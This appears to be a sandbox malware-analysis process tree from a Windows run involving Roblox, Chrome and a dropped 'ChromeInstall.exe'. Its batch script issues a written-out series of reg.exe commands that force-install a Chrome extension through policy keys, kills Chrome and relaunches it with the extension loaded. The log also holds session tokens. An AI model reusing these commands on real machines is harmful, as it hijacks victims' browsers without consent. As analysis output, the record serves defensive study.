"C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\RobloxPlayerBeta.exe" --app -t AmnJ0ybVdJpNkNXv-g4l_eW-cOr8metxPWlB5KCxENMWQFScaM8fJlZkc4VpkkahL_TfaAZ8X4QaaMxh9zNEp12ohMguZwt7HDLQFE__tDsUpYE90aONlEsSu3Uh2i3OuZZFRsa_kQb-TC32q8KGNVx4v-MVLP0DHO2Fl6SZqTIZ_1JHcHvBTS7XolqnQ_kzKL4yZfitJWpc3U528vhOFM4Sra_X6mdt5txUThLGa-A -j https://assetgame.roblox.com/game/PlaceLauncher.ashx?request=RequestGame&browserTrackerId=167300714984&placeId=606849621&isPlayTogetherGame=false&joinAttemptId=4fcd12f5-d851-49c4-b179-f5de4d49ba5e&joinAttemptOrigin=PlayButton -b 167300714984 --launchtime=1680039140103 --rloc en_us --gloc en_us
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3788

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5880 --field-trial-handle=1920,i,17614797361171886357,15965892493182237838,131072 /prefetch:8
3⤵
PID:1900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5684 --field-trial-handle=1920,i,17614797361171886357,15965892493182237838,131072 /prefetch:8
3⤵
PID:4396

C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\RobloxPlayerBeta.exe
\??\C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\RobloxPlayerBeta.exe
2⤵
- Executes dropped EXE
PID:6016

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3044

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x520 0x51c
1⤵
PID:5964

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5316 -ip 5316
1⤵
PID:4712

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:520

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4760

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:5448

C:\Users\Admin\AppData\Local\ServiceApp\ChromeInstall.exe
C:\Users\Admin\AppData\Local\ServiceApp\ChromeInstall.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:2240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\ServiceApp\chrome.bat" "
2⤵
PID:1772

C:\Windows\system32\reg.exe
REG DELETE HKLM\SOFTWARE\Policies\Google\Chrome /f
3⤵
- Modifies registry key
PID:6016

C:\Windows\system32\reg.exe
REG DELETE HKLM\SOFTWARE\Google\Chrome\Extensions\macjkjgieeoakdlmmfefgmldohgddpkj /f
3⤵
- Modifies registry key
PID:2400

C:\Windows\system32\reg.exe
REG DELETE HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\macjkjgieeoakdlmmfefgmldohgddpkj /f
3⤵
- Modifies registry key
PID:5828

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "3" /t REG_SZ /d macjkjgieeoakdlmmfefgmldohgddpkj /f
3⤵
PID:2892

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\macjkjgieeoakdlmmfefgmldohgddpkj" /v "path" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ServiceApp\apps-helper\apps.crx" /f
3⤵
PID:2732

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\macjkjgieeoakdlmmfefgmldohgddpkj" /v "version" /t REG_SZ /d 1.0 /f
3⤵
PID:3216

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "3" /t REG_SZ /d macjkjgieeoakdlmmfefgmldohgddpkj /f
3⤵
PID:4312

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\macjkjgieeoakdlmmfefgmldohgddpkj" /v "path" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ServiceApp\apps-helper\apps.crx" /f
3⤵
PID:2064

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\macjkjgieeoakdlmmfefgmldohgddpkj" /v "version" /t REG_SZ /d 1.0 /f
3⤵
PID:5252

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe /T
3⤵
- Kills process with taskkill
PID:3652

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\Admin\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
3⤵
- Drops Chrome extension
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:3596

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffe62c19758,0x7ffe62c19768,0x7ffe62c19778
4⤵
PID:5372

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1676 --field-trial-handle=2012,i,13024141595516538719,963336017848807098,131072 /prefetch:2
4⤵
PID:4784

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1888 --field-trial-handle=2012,i,13024141595516538719,963336017848807098,131072 /prefetch:8
4⤵
PID:4140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2284 --field-trial-handle=2012,i,13024141595516538719,963336017848807098,131072 /prefetch:8
4⤵
PID:8

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3444 --field-trial-handle=2012,i,13024141595516538719,963336017848807098,131072 /prefetch:8
4⤵
PID:4396

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3860 --field-trial-handle=2012,i,13024141595516538719,963336017848807098,131072 /prefetch:1
4⤵
PID:940

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3448 --field-trial-handle=2012,i,13024141595516538719,963336017848807098,131072 /prefetch:8
4⤵
PID:1180

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4360 --field-trial-handle=2012,i,13024141595516538719,963336017848807098,131072 /prefetch:8
4⤵
PID:4632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4564 --field-trial-handle=2012,i,13024141595516538719,963336017848807098,131072 /prefetch:8
4⤵
PID:6100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4528 --field-trial-handle=2012,i,13024141595516538719,963336017848807098,131072 /prefetch:1
4⤵
PID:5392

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4376 --field-trial-handle=2012,i,13024141595516538719,963336017848807098,131072 /prefetch:1
4⤵
PID:4944

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:1476

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:3136

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:456

C:\Windows\system32\timeout.exe
timeout 5
3⤵
- Delays execution with timeout.exe
PID:4748

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist" /v "3" /t REG_SZ /d macjkjgieeoakdlmmfefgmldohgddpkj /f
3⤵
PID:4596

C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallForcelist" /v "3" /t REG_SZ /d macjkjgieeoakdlmmfefgmldohgddpkj /f
3⤵
PID:972

C:\Windows\system32\timeout.exe
timeout 5
3⤵
- Delays execution with timeout.exe
PID:6120

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe /T
3⤵
- Kills process with taskkill
PID:1988

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default"
3⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4188

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffe62c19758,0x7ffe62c19768,0x7ffe62c19778
4⤵
PID:4692

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1668 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:2
4⤵
PID:5092

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:8
4⤵
PID:5660

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2072 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:8
4⤵
PID:3716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2784 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:1
4⤵
PID:5728

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2792 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:1
4⤵
PID:5736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4460 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:1
4⤵
PID:1984

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4664 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:8
4⤵
PID:5688

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4672 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:1
4⤵
PID:4616

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5044 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:8
4⤵
PID:724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5184 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:8
4⤵
PID:3440

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5328 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:8
4⤵
PID:4748

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5440 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:8
4⤵
PID:5268

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5488 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:8
4⤵
PID:4764

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5580 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:8
4⤵
PID:6016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:8
4⤵
PID:3400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5704 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:1
4⤵
PID:5404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5560 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:8
4⤵
PID:2100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5884 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:8
4⤵
PID:5148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5868 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:8
4⤵
PID:3720

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5312 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:8
4⤵
PID:3400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5900 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:8
4⤵
PID:5692

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5992 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:8
4⤵
PID:5104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:8
4⤵
PID:5324

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5924 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:8
4⤵
PID:1820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5996 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:8
4⤵
PID:2516

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5980 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:8
4⤵
PID:4324

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=4512 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:1
4⤵
PID:5904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1000 --field-trial-handle=1896,i,3641702297762016804,12374874883600358494,131072 /prefetch:8
4⤵
PID:2036

C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\RobloxPlayerLauncher.exe
"C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\RobloxPlayerLauncher.exe" roblox-player:1+launchmode:play+gameinfo:QQB4E3CyKcuD5XJwPYS9WHVX4BJZNA62HQf3tgp_pZga2hFn_SIl_QL44EDiUss_eQSIxTHjbbjTQQ6vDrYG_t5HVSTAVPFvTtV0s466n24ywhc4pb-yhefbVSaaYZJt_2sL2cb1J3rdrOuzVZGt2gnWz8DmNLIartt8CRiUCFbtn2X7s9ca9-Ye-qBSyLxfLsDOs1AhU5AEv-pH8MYVr_sqVwvdugj6G5hhj7GnVzI+launchtime:1680039010573+placelauncherurl:https%3A%2F%2Fassetgame.roblox.com%2Fgame%2FPlaceLauncher.ashx%3Frequest%3DRequestGame%26browserTrackerId%3D167300714984%26placeId%3D606849621%26isPlayTogetherGame%3Dfalse%26joinAttemptId%3D5299a834-2712-4641-89e9-582747e768a9%26joinAttemptOrigin%3DPlayButton+browsertrackerid:167300714984+robloxLocale:en_us+gameLocale:en_us+channel:+LaunchExp:InApp
4⤵
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Modifies registry class
PID:6068

C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\RobloxPlayerLauncher.exe
"C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\RobloxPlayerLauncher.exe" --crashpad --no-rate-limit --database=C:\Users\Admin\AppData\Local\Temp\crashpad_roblox --metrics-dir=C:\Users\Admin\AppData\Local\Temp\crashpad_roblox --url=https://upload.crashes.rbxinfra.com/post --annotation=RobloxChannel=production --annotation=RobloxGitHash=d4a4a4ad1cbd35850c37a672e5c216b9b80fbbae --annotation=UploadAttachmentKiloByteLimit=100 --annotation=UploadPercentage=100 --annotation=format=minidump --annotation=token=a2440b0bfdada85f34d79b43839f2b49ea6bba474bd7d126e844bc119271a1c3 --initial-client-data=0x700,0x704,0x708,0x684,0x728,0x81f748,0x81f758,0x81f768
5⤵
- Executes dropped EXE
PID:424

C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\RobloxPlayerBeta.exe
"C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\RobloxPlayerBeta.exe" --app -t QQB4E3CyKcuD5XJwPYS9WHVX4BJZNA62HQf3tgp_pZga2hFn_SIl_QL44EDiUss_eQSIxTHjbbjTQQ6vDrYG_t5HVSTAVPFvTtV0s466n24ywhc4pb-yhefbVSaaYZJt_2sL2cb1J3rdrOuzVZGt2gnWz8DmNLIartt8CRiUCFbtn2X7s9ca9-Ye-qBSyLxfLsDOs1AhU5AEv-pH8MYVr_sqVwvdugj6G5hhj7GnVzI -j https://assetgame.roblox.com/game/PlaceLauncher.ashx?request=RequestGame&browserTrackerId=167300714984&placeId=606849621&isPlayTogetherGame=false&joinAttemptId=5299a834-2712-4641-89e9-582747e768a9&joinAttemptOrigin=PlayButton -b 167300714984 --launchtime=1680039010573 --rloc en_us --gloc en_us
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2240

C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\RobloxPlayerBeta.exe
"C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\RobloxPlayerBeta.exe" -d
6⤵
- Executes dropped EXE
PID:4732

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:5288

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:5648

C:\Users\Admin\AppData\Local\ServiceApp\ChromeInstall.exe
C:\Users\Admin\AppData\Local\ServiceApp\ChromeInstall.exe
1⤵
- Executes dropped EXE
PID:2292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3208 -ip 3208
1⤵
PID:3164

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5640

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x520 0x51c
1⤵
PID:3608

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc
1⤵
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:2352

C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
1⤵
PID:4084

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:6464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
- Modifies registry class
PID:4880

C:\Users\Admin\AppData\Local\ServiceApp\ChromeInstall.exe
C:\Users\Admin\AppData\Local\ServiceApp\ChromeInstall.exe
1⤵
- Executes dropped EXE
PID:6892

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\4dc791e3099f490dac601607e8f5a701 /t 6128 /p 4188
1⤵
PID:7052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
- Checks processor information in registry
- Modifies registry class
PID:6016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
- Checks processor information in registry
- Modifies registry class
PID:1116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
- Checks processor information in registry
- Modifies registry class
PID:6572

C:\Users\Admin\AppData\Local\ServiceApp\ChromeInstall.exe
C:\Users\Admin\AppData\Local\ServiceApp\ChromeInstall.exe
1⤵
- Executes dropped EXE
PID:3300

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:6384

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:7028

C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
1⤵
PID:6060

C:\Windows\system32\OpenWith.exe
